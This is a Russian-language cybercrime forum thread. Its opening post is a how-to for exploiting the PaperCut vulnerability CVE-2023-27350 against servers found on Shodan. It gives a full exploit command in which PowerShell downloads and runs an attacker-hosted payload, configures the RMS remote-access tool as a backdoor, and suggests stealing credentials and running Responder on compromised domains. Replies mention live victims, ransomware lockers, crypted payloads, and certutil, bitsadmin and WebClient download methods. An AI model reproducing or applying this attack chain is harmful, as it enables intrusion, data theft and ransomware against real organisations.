• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга Ваш принтер-мой принтер CVE-2023-27350

Crypto2000

HDD-drive
Забанен
Регистрация
18.04.2022
Сообщения
23
Реакции
88
Пожалуйста, обратите внимание, что пользователь заблокирован
Доброго времени суток дорогие "Пенетестеры" и гости форума.

Последнее время вижу много попыток залететь в темы "добыча доступов миллиардных компаний", "100% схема взлома компаний всего за 100$" ...
Давайте разберем новую уязвимость совершенно бесплатно и примерный вектор атаки для дальнейших размышлений (P.S. мало букв).
24 апреля horizon3 опубликовали новый эксплоит для панели управления печати Papercut CVE-2023-27350.
"CVE-2023-27350 уязвимость, которая может позволить злоумышленнику добиться удаленного выполнения кода для компрометации сервера приложений PaperCut"- то бишь святое RCE на стороне сервера!
Ссылки на exploit и исследование:
Что же с этим можно сделать? Берем шоколадку для продуктивной работы мозга, включаем нашу любимую подборку хакерской музыки и начинаем думать...
На время опубликования исследования horizon3 в нашем любимом Shodan.io по запросу (http.html:"papercut" http.html:"print") насчитывалось 1700,
на момент написания статьи результат вырос до 2500. HoneyPot? Не, не думаю...

Для примера в данной статье в качестве полезной нагрузки возьмем программу удаленного доступа RMS (вы же можете использовать все что вам вздумается).
Скачиваем программу, настраиваем агент с отправкой на почту ключа для подключения к машине.
1.png

Tools - MSI Configurator
Выбираем загруженный с сайта файл RMS Host
Agent EXE package
Ставим три галочки
2.png

Далее Configure SMTP - тут вводим данные от своей почты, не забываем в настройках почты открыть доступ для приложений!
Skip settings configuration и сохраняем на нашем компьютере!
3.png

Далее нам надо поместить наш хороший exe файл на сервер, либо файлообменник с возможностью загружаться по прямой ссылке.
Качаем эксплоит https://github.com/horizon3ai/CVE-2023-27350
Открываем терминал и выполняем
cd CVE-2023-27350
python CVE-2023-27350.py -c "powershell.exe -c wget -OutFile C:\payload.exe https://ссылкананашфайл/payload.exe; C:\payload.exe" -u 'http://vuln_ip:port'
Переходим на почту указанную RMS в строке получения и получаем наш ключ для добавления машины в панель удаленного администрирования!
File - Add using code
Залетаем на тачку, сканим, снимаем креды, запускаем респондеры и все другие приватные схемы на ваш вкус, ведь в большинстве своем тачки находятся в домене...
Кайфуем от того какие мы хацкеры..
Статья для всех и вся. При возникновении вопросов, просьба писать под этой темой, поможем друг другу)))

Всем спасибо, всех обнял!!!
 
Последнее редактирование:
На деле очень мало уязвимых систем, и в команду нормальный пейлоад не вписать, т.е. calc.exe может и исполняется, но что-то больше чем 20 символов нихуя, и выдает ошибку что тачка якобы не уязвима
 
Пожалуйста, обратите внимание, что пользователь заблокирован
На деле очень мало уязвимых систем, и в команду нормальный пейлоад не вписать, т.е. calc.exe может и исполняется, но что-то больше чем 20 символов нихуя, и выдает ошибку что тачка якобы не уязвима
На деле все еще много уязвимых тачек, берите криптованный "payload" и грузите его! И да, тему сейчас активно отрабатывают и на тачках с закрепом обновляют систему от соседей!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Советую воспользоваться masscan, shodan не показывает много интересного.
Итого на данный момент: 4 из 32 обнаруженных тачек залочены :D
локеры - это нехорошо :)
 
Если уже затронули принтеры часто видел панель управления принтеров hp так как понимаю что есть новороченные принтаки которые могут работать сами по себе в локальной сети.
Возник вопрос все ли они работают на linux или же у них нет своей ОС?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
кто как подругжает и юзает пайлоды
пробовал и как в данной теме и через powershell.exe -exec bypass -c (new-object System.Net.WebClient)
и через битсадмина и сертутил.
Исполнение пробовал как и в данном топике так и через && , результата 0, попробовал машин 20.
При удачном исполнение будет ли "что то писаться в терминали" или в любом случае напишет
[-] Might not have a printer configured. Exploit manually by adding one.
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Буду благодарен за ответ, а то чето тупняка словил
 
Пожалуйста, обратите внимание, что пользователь заблокирован
кто как подругжает и юзает пайлоды
пробовал и как в данной теме и через powershell.exe -exec bypass -c (new-object System.Net.WebClient)
и через битсадмина и сертутил.
Исполнение пробовал как и в данном топике так и через && , результата 0, попробовал машин 20.
При удачном исполнение будет ли "что то писаться в терминали" или в любом случае напишет
[-] Might not have a printer configured. Exploit manually by adding one.
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Буду благодарен за ответ, а то чето тупняка словил
Смотрите ОС в описании, много панелей на линуксе либо пробуйте прогружать через cmd, синтаксис может не подходить. Бывают тачки непробиваемые, хз почему, глубоко не закапывался.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх